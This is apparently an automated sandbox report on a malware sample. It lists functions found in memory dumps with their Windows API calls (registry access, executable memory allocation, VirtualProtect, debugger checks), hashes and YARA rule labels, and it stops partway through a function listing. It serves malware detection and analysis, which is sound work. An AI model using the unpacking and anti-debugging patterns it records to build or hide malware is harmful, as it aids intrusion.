Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: d67cbce64f59b601c8ecb62de5eb25e0d8acab4e8987cad21c36c453341d665b
Instruction ID: 9f22d5cae54284209d0eaea9e4ae89cdef75706d8b51845dba53f6c40559b1ae
Opcode Fuzzy Hash: d67cbce64f59b601c8ecb62de5eb25e0d8acab4e8987cad21c36c453341d665b
Instruction Fuzzy Hash: 4F01B1B1500600ABD710DF1ADC82B26FBA8EB88A20F14816AED088B641D231B916CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0233AAEE, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0233AB32

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 29c0d52f1d746ad5b58883a1b62d7335178e37eef87aa5c2410a61a8750effe2
Instruction ID: 41260e34651669db3cdc855b62b8ab3552352b461869997c3bd1c3b942335c2e
Opcode Fuzzy Hash: 29c0d52f1d746ad5b58883a1b62d7335178e37eef87aa5c2410a61a8750effe2
Instruction Fuzzy Hash: 4301AD31400740DFDB22CF55D944B52FFE5EF08720F0888AAED894BA62D376E414DB62

Uniqueness

Uniqueness Score: -1.00%

Function 05491626, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,?,?), ref: 05491676

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: be92962e6460f87991bb814576b8828a18d193c82b7e07c1a26494835dd46d18
Instruction ID: 6673507795691521c1c36460064e04752724f3284a3e8baa752c1d8dfff41ced
Opcode Fuzzy Hash: be92962e6460f87991bb814576b8828a18d193c82b7e07c1a26494835dd46d18
Instruction Fuzzy Hash: 5601A271500604ABD214DF1ADC82F26FBE8FB89B20F14811AED084B741D271F916CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 054909DE, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E94,?,?), ref: 05490A2E

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 43a8aa5f2c74a5ad4b59b5f0c12ff5407a86e7f0aa603c9ca9de6f5224943b14
Instruction ID: 954dc7f534847b688b9834495871e507757f35a03b55b1ade2ee93e44a25b064
Opcode Fuzzy Hash: 43a8aa5f2c74a5ad4b59b5f0c12ff5407a86e7f0aa603c9ca9de6f5224943b14
Instruction Fuzzy Hash: 9401A271500604ABD214DF1ADC82F26FBE8FB89B20F14811AED084B741D271F916CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 054913B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,057ECA00,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 054913E4

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ddfcb5450c43d01a94c770d3a16ba0343211dfa90a7ce84ac19d4a20c8f154f8
Instruction ID: 8692159ece1c940964b0aa966d6078a48c42e4d4f17dde94f46853ea62f2e5ff
Opcode Fuzzy Hash: ddfcb5450c43d01a94c770d3a16ba0343211dfa90a7ce84ac19d4a20c8f154f8
Instruction Fuzzy Hash: 4A0184B56003419FEB24CF1AD9867A6FF94EF04220F08C4ABDD498F646D274E444DA61

Uniqueness

Uniqueness Score: -1.00%

Function 0233B2B6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,057ECA00,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 0233B2E8

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: c6d273fdf15f7ded87952d8443c70b306343e68011b2fc521d5e2b6fc8821aa5
Instruction ID: 9059d34944dfcd669344ba93baa232b80b8c6067044bc26191fab0d69fe6db92
Opcode Fuzzy Hash: c6d273fdf15f7ded87952d8443c70b306343e68011b2fc521d5e2b6fc8821aa5
Instruction Fuzzy Hash: 7B01F7715043408FD711CF1AD885766FBA4EF04234F08C0AADC4A8F646D374E504CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0233AF1E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,057ECA00,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 0233AF50

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b194bfc017a82a8a6de32b1ce7a919efad10e78c7106c1a3483fb1f760d1888b
Instruction ID: c3e2a0068e68944f6436f56f1bb780c28a1b8a4f5374452688571e7754c05bbc
Opcode Fuzzy Hash: b194bfc017a82a8a6de32b1ce7a919efad10e78c7106c1a3483fb1f760d1888b
Instruction Fuzzy Hash: 2A0184B55043408FDB11CF5ADD85755FB94DF04221F08C4ABDD49CF656D374E544CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0233ADD6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E94,?,?), ref: 0233AE26

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 3ae27f9475643175879a09e76684c746298e2785d0d9d46fab9b532e41401e6a
Instruction ID: dcda98f0858f04d103b4d09efc427645c1ab321842f5dc067759d0e6133c2f23
Opcode Fuzzy Hash: 3ae27f9475643175879a09e76684c746298e2785d0d9d46fab9b532e41401e6a
Instruction Fuzzy Hash: 4601A271500600ABD214DF1ADC82F26FBE8FB89B20F14811AED084B741D271F916CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 05490C7E, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(?,057ECA00,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 05490CB0

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 20985253f005f62deca140391d2366975b57e4fec1963c3fdecf9a2aba825933
Instruction ID: 5db40fd6f6edcbe9e2d24376b861ed5ba83e283c3e883180406864b8f2d1eb28
Opcode Fuzzy Hash: 20985253f005f62deca140391d2366975b57e4fec1963c3fdecf9a2aba825933
Instruction Fuzzy Hash: A901D6756003408FDB14CF16D88A7A6FFE4EF04320F08C0ABDD498B755D274E804DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0233A7B6, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0233A7E8

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 3ca01b2b24a7b6d365c8dac51cfe6ee546344386a9a4ad74b397c8aec62fd55e
Instruction ID: dd98a755dd27af7650ecf6cc905354f97b69e4e4c7136bd80af21e047cafb128
Opcode Fuzzy Hash: 3ca01b2b24a7b6d365c8dac51cfe6ee546344386a9a4ad74b397c8aec62fd55e
Instruction Fuzzy Hash: 5901D1709043409FEB21CF5AD885765FFA4EF04320F08C4AADD898F646E378A904CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0233A23A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,057ECA00,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 0233A26C

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a664cbc2017454f97fe74811da035bc2ce7e64a0a4c1683334b2e16da768d4a5
Instruction ID: 1b112bea81b43916a65fe7eb8e6ea65d2a57ab7b60a444e204fd4279d2817b5e
Opcode Fuzzy Hash: a664cbc2017454f97fe74811da035bc2ce7e64a0a4c1683334b2e16da768d4a5
Instruction Fuzzy Hash: 95F0AF749143408FDB21CF06D885761FBA4EF04721F18C09ADD898B656D3BAA608CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0046E0B9, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?), ref: 0046E0E5

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6a110a7992cb3930414f0f3f528cd82985da53f9459d4a94a8ae5f23e16bfc95
Instruction ID: 7b882071ac52baaf5cca4003c2f3039d4822f21854744d75915b6db299ec355b
Opcode Fuzzy Hash: 6a110a7992cb3930414f0f3f528cd82985da53f9459d4a94a8ae5f23e16bfc95
Instruction Fuzzy Hash: 1FD01726A0293A361615366BAC068DF278C9E06374314402BF5009A581FF9CEA8282FF

Uniqueness

Uniqueness Score: -1.00%

Function 0046812C, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 00468141

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: e6d39757a1d05669ab8266a892b99ff55a9881c679ea1d7cde727d37b0c5f243
Instruction ID: e29f90c7354974b66f6c83bd66e42668521c8e0a667c50f019921329cfc5816f
Opcode Fuzzy Hash: e6d39757a1d05669ab8266a892b99ff55a9881c679ea1d7cde727d37b0c5f243
Instruction Fuzzy Hash: C9D0A7B29543446EDB009F747C097623BDCD388395F10843AFA0DC6250F5B4C9C0D509

Uniqueness

Uniqueness Score: -1.00%

Function 00468F47, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 00468F49

Part of subcall function 00468ED5: TlsGetValue.KERNEL32(00000000,?,00468F4E,00000000,0046A256,00472120,00000000,00000314,?,00468603,00472120,Microsoft Visual C++ Runtime Library,00012010), ref: 00468EE7
Part of subcall function 00468ED5: TlsGetValue.KERNEL32(00000005,?,00468F4E,00000000,0046A256,00472120,00000000,00000314,?,00468603,00472120,Microsoft Visual C++ Runtime Library,00012010), ref: 00468EFE
Part of subcall function 00468ED5: RtlEncodePointer.NTDLL(00000000,?,00468F4E,00000000,0046A256,00472120,00000000,00000314,?,00468603,00472120,Microsoft Visual C++ Runtime Library,00012010), ref: 00468F3C

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 0a3be5924a655ad9b1b3d8766adeba62e091443e147a0e3968edd9f4fe56f7c9
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0046DF82, Relevance: 1.3, APIs: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0046DFAD

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bb0c3bc3228288cce9e5ce64ec1224f1418d127d424630468e81e3aa877e04ca
Instruction ID: 2c325b31774fd3117388dbc4dcd58e9448173e4f6630165209457fc92a2f4b09
Opcode Fuzzy Hash: bb0c3bc3228288cce9e5ce64ec1224f1418d127d424630468e81e3aa877e04ca
Instruction Fuzzy Hash: A7210536E00315EBCB209FAADD81B5AB7F4FF04308F04442AE645D7202E6B8E955CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0046DED9, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0046DF04

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 77d234fbd1e0fc10e312bccadac29d0482b63829ab6a0aae6a8aa686ae23919a
Instruction ID: 45a5bf24a22986cae4a3da9263c8c2df37b73c71bbd66e81d9cc7e49ddc3a85e
Opcode Fuzzy Hash: 77d234fbd1e0fc10e312bccadac29d0482b63829ab6a0aae6a8aa686ae23919a
Instruction Fuzzy Hash: C711D672E00304EBCB109F99DD85B9AB7F4FF04304F04446AE646D7202E275E955CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0046E0F0, Relevance: 1.3, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0046E0FA

Part of subcall function 0046D46C: VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0046D493
Part of subcall function 0046D46C: VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0046D4BA
Part of subcall function 0046D46C: GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0046D4C0
Part of subcall function 0046D46C: FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0046D4C7

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ProtectVirtual$CacheCloseCurrentFlushHandleInstructionProcess
String ID:
API String ID: 2900862000-0
Opcode ID: e9df2dca61534a132d02b80bd6050cbc6a72b8be4724e327fa420c758eaca006
Instruction ID: cdd7466d63614728181adbdc31d54f8ba2757280d4c1272a33f7cde5f42f689f
Opcode Fuzzy Hash: e9df2dca61534a132d02b80bd6050cbc6a72b8be4724e327fa420c758eaca006
Instruction Fuzzy Hash: 21F02236900104EFCB209B06EE46A8AF7F8EB40329F20447BE44963222D3B56D80DE98

Uniqueness

Uniqueness Score: -1.00%

Function 055F2E02, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.944364847.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc4f149aa555b4fc08e6231826d086b46ac3a1d4de871f16f9ed23e68532ffc8
Instruction ID: 0141e0d1804a92883ccb01306bcfb506959ddb2dd8797720d0205a65ff8419d6
Opcode Fuzzy Hash: bc4f149aa555b4fc08e6231826d086b46ac3a1d4de871f16f9ed23e68532ffc8
Instruction Fuzzy Hash: A521E5B5608341AFD340CF19D881A1BFBE4FF89664F04896EF888D7311E270E9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 055F3874, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.944364847.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e4b0bad1e0f71c493f559bc82b84bbae6caee69bb8f62cb65427f02360a4091
Instruction ID: 9d04de2e39b6f247f9445642c5dd8476795feb484cb13359a396cc942fd8e782
Opcode Fuzzy Hash: 4e4b0bad1e0f71c493f559bc82b84bbae6caee69bb8f62cb65427f02360a4091
Instruction Fuzzy Hash: D711BAB5609341AFD350CF19D881A5BFBE4FB88664F14896EF898D7311D231E9048FA6

Uniqueness

Uniqueness Score: -1.00%

Function 02460C34, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.942697946.0000000002460000.00000040.00000040.sdmp, Offset: 02460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b6f82326610193c28e3498e1bf17caa2bd5cdf00d593da0532fa74110eed9d
Instruction ID: f681d4625b6665e158e76cb4b0b32b474a30b46ede2c8fb472c374dfde25df50
Opcode Fuzzy Hash: a0b6f82326610193c28e3498e1bf17caa2bd5cdf00d593da0532fa74110eed9d
Instruction Fuzzy Hash: B311D630244340DFD319CB14C544B36BBA6BB48708F24C59EE9490B742C77BD847CA52

Uniqueness

Uniqueness Score: -1.00%

Function 02460BFD, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.942697946.0000000002460000.00000040.00000040.sdmp, Offset: 02460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8057fb432b214d09b1ef21f5142a3281e77b1ad675ceb45e237c2d642b89402d
Instruction ID: d360f78baf682668c9359f49d75cd4e5f6b64f9a10fb572b06ab692709dd30f2
Opcode Fuzzy Hash: 8057fb432b214d09b1ef21f5142a3281e77b1ad675ceb45e237c2d642b89402d
Instruction Fuzzy Hash: 8F214F7550D3C08FD717CB10D994B55BF72AB46218F1985EFD8898B6A3D33A880ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 055F3718, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.944364847.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a34149e7bbcef6608d68f2b44641097a1c4cc44f41e27db7b2bd1235962ee75
Instruction ID: d97d6067d099d198ad6cd4e1144220a89fd7b5ca94ef8b6d8dcfb5d034dfe44d
Opcode Fuzzy Hash: 8a34149e7bbcef6608d68f2b44641097a1c4cc44f41e27db7b2bd1235962ee75
Instruction Fuzzy Hash: 2911CCB5608301AFD350CF19DC81E57FBE8EB88660F14892EFD9997311D271E9059FA2

Uniqueness

Uniqueness Score: -1.00%

Function 024605D2, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.942697946.0000000002460000.00000040.00000040.sdmp, Offset: 02460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37b4425ab8801626b6a443c211dbfe7e670c1e919b2e547efcecc06829bd4525
Instruction ID: 4c1a12b15ba3b8424befda8d08ce7ddd51d0a962db60d754a906eccff7d043f1
Opcode Fuzzy Hash: 37b4425ab8801626b6a443c211dbfe7e670c1e919b2e547efcecc06829bd4525
Instruction Fuzzy Hash: 70F0AEB55097805FD711CB05DC41862FFA8DB46620709C09FEC49C7651D125B904C771

Uniqueness

Uniqueness Score: -1.00%

Function 02460CF0, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.942697946.0000000002460000.00000040.00000040.sdmp, Offset: 02460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction ID: 840a6c4090776fc7bbc432a0e9b6ee1b0b4f5e2500e6ac60d49e56231271af35
Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction Fuzzy Hash: 0EF03C35248644DFC306CF00D944B26FBA2FB89718F24C6ADE9490B762C737E813DA82

Uniqueness

Uniqueness Score: -1.00%

Function 024605F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.942697946.0000000002460000.00000040.00000040.sdmp, Offset: 02460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f75dfb8c32f8c32d8bc36cad477411ed619b6a02ae0bf383037c4ae400926f81
Instruction ID: 6192e3b99c2609593f36325e7025da1ac9b303f857e8cf96dbc4c860d905a081
Opcode Fuzzy Hash: f75dfb8c32f8c32d8bc36cad477411ed619b6a02ae0bf383037c4ae400926f81
Instruction Fuzzy Hash: 82E012B66447445BD650CF0AEC42852FBD8EB84630718C47FDC0D8B711E575F905CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 055F2E77, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.944364847.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63fc4370cf2c63ef7b0d05fdbf2805c3efe152e436e73dec11486cc3dbfbfbde
Instruction ID: 835515b9059bd69a11d099ebf093d1a95d9aa8149d25085942d80dc08d5fb18e
Opcode Fuzzy Hash: 63fc4370cf2c63ef7b0d05fdbf2805c3efe152e436e73dec11486cc3dbfbfbde
Instruction Fuzzy Hash: 75E0D8B264134067E210CF069C42F12FB98DB80A30F04C457ED0C1B742E071B9148AE5

Uniqueness

Uniqueness Score: -1.00%

Function 055F3767, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.944364847.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceb77d45b63bce9b3b0329d68fd61eb2c57a8340abedcf381c0d7529c0b03127
Instruction ID: af0edcb20ca12fef9eb6140aa1141ef6f869330d2c6c10f6881b9c76f0eb5186
Opcode Fuzzy Hash: ceb77d45b63bce9b3b0329d68fd61eb2c57a8340abedcf381c0d7529c0b03127
Instruction Fuzzy Hash: 81E0D8B264130467D250CE069C82F13FBA8DB40A30F04C457ED0D1B702E172B50499F5

Uniqueness

Uniqueness Score: -1.00%

Function 055F38DF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.944364847.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1086c59c682173bb97a8cc4412be09eece051c45530964ea481cbf30beb5039c
Instruction ID: 67e447789ac8ff4b345aceaff95c8b61672d491930cb6f86bb2d2128a2d13c5a
Opcode Fuzzy Hash: 1086c59c682173bb97a8cc4412be09eece051c45530964ea481cbf30beb5039c
Instruction Fuzzy Hash: C1E0D8B265130067D210CE069C42F12FB98DB84A30F04C46BED0C1B741E071B51489E5

Uniqueness

Uniqueness Score: -1.00%

Function 055F318B, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.944364847.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d87dc1bef8a123e740289b29f4714008fac8d19b27bd94d63743550fce55b63e
Instruction ID: fdb4fce3349b84c66ecb27bbfff092d02ff5c29e8750cb70b15d37e38f2f4be6
Opcode Fuzzy Hash: d87dc1bef8a123e740289b29f4714008fac8d19b27bd94d63743550fce55b63e
Instruction Fuzzy Hash: 30E0D8B264130067E210CE06EC42F13FB98DB80A70F04C457ED0D1B701E072B514C9E5

Uniqueness

Uniqueness Score: -1.00%

Function 023323F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.942529306.0000000002332000.00000040.00000001.sdmp, Offset: 02332000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9efacfadc9e06297154c6ba7d33b1737399a478752a1cc7bcb292e11a8aa0321
Instruction ID: 2e35554fd64379d89b1400863ba993fb39cd30598dc2026fa5c7b658edcbcf5f
Opcode Fuzzy Hash: 9efacfadc9e06297154c6ba7d33b1737399a478752a1cc7bcb292e11a8aa0321
Instruction Fuzzy Hash: 05D05E79304A914FD3278A1CC1A4B963BD4AB51B18F4A44F9AC008B677C769EA81D200

Uniqueness

Uniqueness Score: -1.00%

Function 023323BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.942529306.0000000002332000.00000040.00000001.sdmp, Offset: 02332000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c409dce7df3b617eddba5179ef23d39994882ab7a9aa3b7a2c7e8e00d8551afa
Instruction ID: 83971f216eb9de28005f0ec0f79feaddd3a15314b09d37470dee1405e361af7b
Opcode Fuzzy Hash: c409dce7df3b617eddba5179ef23d39994882ab7a9aa3b7a2c7e8e00d8551afa
Instruction Fuzzy Hash: 82D05E352402814BC716DB0CC294F5A77D4AB41B18F0A44E8AC008B276C7A4DDC1C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00469BB5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0046BB4E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0046BB63
UnhandledExceptionFilter.KERNEL32(&G), ref: 0046BB6E
GetCurrentProcess.KERNEL32(C0000409), ref: 0046BB8A
TerminateProcess.KERNEL32(00000000), ref: 0046BB91

Strings

&G, xrefs: 0046BB69

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: &G
API String ID: 2579439406-3478635403
Opcode ID: 280995843e8b5d17928027ce069fb3bd7bc5a9760730031b98d06e04668ee95f
Instruction ID: dad767f612b91296ab9fba96bedd77cf3d5f220770165d082976aa4fe39147c8
Opcode Fuzzy Hash: 280995843e8b5d17928027ce069fb3bd7bc5a9760730031b98d06e04668ee95f
Instruction Fuzzy Hash: 6821E9B88012019BD758EF28FF89A443BE4FB08301F10603AE90C87A61E7F059C58F9E

Uniqueness

Uniqueness Score: -1.00%

Function 00468746, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001704), ref: 0046874B

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 61e8d2687379d4b5988fae15c2564431f6b2c8bca7b9fdfc234e7c95ce9354f0
Instruction ID: 7521608217d8db32a91c5c9f375a7f9e73908697da2cdef767ba4d59660f9362
Opcode Fuzzy Hash: 61e8d2687379d4b5988fae15c2564431f6b2c8bca7b9fdfc234e7c95ce9354f0
Instruction Fuzzy Hash: 229002A06611028A865017B06C0954566905A58607761A575E145D4455FEA44004652B

Uniqueness

Uniqueness Score: -1.00%

Function 0046D412, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e624ca07e480b20f3e87d250268d7befd875a58a2c7744576e64497166e65542
Instruction ID: d1b98ab3fd22ba90a173133da45dca60f7156ec6ca5619534e878b30cbc51ab9
Opcode Fuzzy Hash: e624ca07e480b20f3e87d250268d7befd875a58a2c7744576e64497166e65542
Instruction Fuzzy Hash: 58D0C970A1528CEFDB15CF59D116B8EBBB8AB01748F600085D4405B356C2B9AE42DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0046D4D0, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c38f530f393c8e445e7f9ebfc598e40a83d4b02ab9be02f0dcf01f71a647c4e9
Instruction ID: 407298c3e1ae8bcc4c38e3d17ce9ffd955588cb438dee74fa142f96febb4e7cc
Opcode Fuzzy Hash: c38f530f393c8e445e7f9ebfc598e40a83d4b02ab9be02f0dcf01f71a647c4e9
Instruction Fuzzy Hash: 83D01270E0528CFFDB11CB44D245B4ABBF8AB0074CF108098E00597681C3B9AF44D744

Uniqueness

Uniqueness Score: -1.00%

Function 0046903C, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00470660,0000000C,00469177,00000000,00000000,?,?,004686BF,0046710E), ref: 0046904E
__crt_waiting_on_module_handle.LIBCMT ref: 00469059

Part of subcall function 0046815C: Sleep.KERNEL32(000003E8,?,?,00468F9F,KERNEL32.DLL,?,004686EC,?,00467108,?), ref: 00468168
Part of subcall function 0046815C: GetModuleHandleW.KERNEL32(?,?,?,00468F9F,KERNEL32.DLL,?,004686EC,?,00467108,?), ref: 00468171

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00469082
